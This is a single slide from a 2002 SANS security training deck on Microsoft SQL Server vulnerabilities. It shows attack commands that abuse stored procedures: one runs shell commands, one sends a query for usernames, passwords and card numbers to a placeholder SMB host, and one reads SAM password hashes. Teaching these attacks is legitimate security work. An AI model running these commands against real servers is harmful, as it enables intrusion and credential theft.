Slide 77
Slide 77 text
SANS 2002 77
MSSQL – Vulnerabilities
• Dangerous Stored Procedures
– The infamous xp_cmdshell
EXEC master..xp_cmdshell “cmd.exe /c …”
– Sending query results back to you via SMB
EXEC master..sp_makewebtask “\\ip\tmp\test.html”,
“SELECT username, password,cc from users”
– Dump the SAM password hashes via xp_regread
EXEC xp_regread HKLM,
'SECURITY\SAM\Domains\Account ','F'